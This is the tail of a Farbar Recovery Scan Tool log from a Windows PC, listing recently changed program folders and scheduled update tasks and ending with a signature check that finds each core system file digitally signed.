2016-02-05 13:37 - 2015-12-08 10:47 - 00003108 _____ C:\Windows\System32\Tasks\Microsoft OneDrive Auto Update Task-S-1-5-21-1343854479-873069186-2863876452-1002
2016-02-05 13:33 - 2015-10-07 13:32 - 00002239 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2016-02-05 13:27 - 2015-12-08 11:20 - 00000000 ____D C:\ProgramData\Claro Software
2016-02-04 13:39 - 2015-10-07 11:34 - 00000000 ____D C:\ProgramData\Hewlett-Packard
2016-02-02 04:26 - 2015-10-07 13:32 - 00003896 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2016-02-02 04:26 - 2015-10-07 13:32 - 00003660 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2016-02-01 15:04 - 2015-12-08 11:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Claro Software
2016-02-01 15:04 - 2015-12-08 11:20 - 00000000 ____D C:\Program Files (x86)\Claro Software
2016-02-01 15:03 - 2015-12-08 11:21 - 00000000 ____D C:\ProgramData\regid.2004-06.com.clarosoftware
2016-02-01 13:14 - 2015-12-08 09:18 - 00000000 ____D C:\Users\Molly Poole\AppData\Local\Google
2016-01-28 20:46 - 2013-08-22 15:36 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2016-01-28 20:46 - 2013-08-22 15:36 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2016-01-28 20:45 - 2015-12-08 10:30 - 00000000 ____D C:\Program Files\Microsoft Office
2016-01-24 23:10 - 2015-12-08 09:17 - 00000000 ____D C:\Users\Molly Poole
2016-01-24 20:00 - 2013-08-22 15:36 - 00000000 ___HD C:\Program Files\WindowsApps
2016-01-22 21:29 - 2015-12-14 21:42 - 00000000 ____D C:\Users\Molly Poole\AppData\Local\Adobe
2016-01-22 18:10 - 2015-12-08 10:17 - 00000000 ____D C:\ProgramData\Nuance
2016-01-22 14:12 - 2015-12-08 10:24 - 00000000 ____D C:\Users\Molly Poole\AppData\Roaming\Apple Computer
2016-01-22 14:12 - 2014-11-22 01:00 - 00992588 _____ C:\Windows\system32\PerfStringBackup.INI
2016-01-19 13:41 - 2013-08-22 15:36 - 00000000 ____D C:\Windows\rescache
2016-01-19 12:50 - 2015-12-08 10:30 - 00002457 _____ C:\Users\Public\Desktop\Sonocent Audio Notetaker.lnk
2016-01-19 12:00 - 2015-12-08 11:55 - 00001235 _____ C:\Users\Molly Poole\AppData\Roaming\SAS7_000.DAT
2016-01-18 22:07 - 2015-10-07 13:33 - 00003886 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2016-01-18 22:06 - 2015-10-07 13:33 - 00002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2016-01-13 21:41 - 2015-10-07 11:52 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2016-01-13 21:41 - 2015-10-07 11:52 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2016-01-13 21:40 - 2015-10-07 13:08 - 00000000 ____D C:\Windows\system32\appraiser
2016-01-13 21:40 - 2014-11-22 05:15 - 00000000 ___SD C:\Windows\system32\CompatTel
2016-01-13 18:21 - 2013-08-22 15:20 - 00000000 ____D C:\Windows\CbsTemp
2016-01-13 18:20 - 2015-10-07 11:53 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2016-01-13 18:17 - 2015-10-07 13:00 - 00000000 ____D C:\Windows\system32\MRT
2016-01-13 18:14 - 2015-10-07 13:00 - 143671360 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
 
==================== Files in the root of some directories =======
 
2015-12-08 11:55 - 2016-01-19 12:00 - 0001235 _____ () C:\Users\Molly Poole\AppData\Roaming\SAS7_000.DAT
 
Some files in TEMP:
====================
C:\Users\Molly Poole\AppData\Local\Temp\sqlite3.dll
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2016-02-05 17:12
 
==================== End of FRST.txt ============================
